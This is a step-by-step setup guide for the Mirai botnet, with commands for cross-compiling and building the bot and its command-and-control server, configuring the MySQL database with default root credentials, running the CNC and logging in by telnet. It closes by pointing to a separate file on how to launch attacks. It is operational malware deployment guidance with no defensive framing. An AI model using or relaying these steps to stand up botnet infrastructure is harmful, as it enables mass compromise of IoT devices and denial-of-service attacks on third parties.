Mirai Setup Instruction

Step 1: Update and upgrade, use root to make things easier
	
	sudo su
	apt-get update -y
	apt-get upgrade -y

Step 2: run cross-compile.sh (navigate into the scripts folder)
		Thsi script download and compile xcompiler for you. See script for detail.

	cd scripts
	./x-compile.sh

Step 3: Install go packages:
	
	go get github.com/go-sql-driver/mysql
	go get github.com/mattn/go-shellwords

Step 4: building mirai; (Naviage to the mirai folder where the script located)
		the output files will be in the debug folder, with cnc and mirai.dbg
	
	./build.sh debug telnet

Step 5: Database setup (to secure database installation)
		Table setup and create user
		(read the last line in db.sql, that's the user that we create to log in to cnc)

	/usr/bin/mysql_secure_installation
	cd scripts
	mysql -u root -p
	<enter password>
	source db.sql;
	quit;

Step 6: Database continuing
		edit main.go file located in ../mirai/cnc
		assuming you set the database password as root

	e.g.
	const DatabaseAddr string   = "127.0.0.1:3306"
	const DatabaseUser string   = "root"
	const DatabasePass string   = "root"
	const DatabaseTable string  = "mirai"

Step 7: to run cnc
	
	restart mysql: service mysql restart
	navigate to debug foler: cd /mirai/debug
	run the cnc: ./cnc
	------------------------------------------
	then telnet to access cnc
	in windows or ubuntu, use Putty; in Mac, simply telnet in terminal
	e.g.
	telnet localhost
	-------------------------------------------
	login credential(set in step 5): 
	username: root
	password: root

------------------------------------------------------------------------------------------
         setup complete
------------------------------------------------------------------------------------------

refer to attack-instruction to see how to launch an attack.





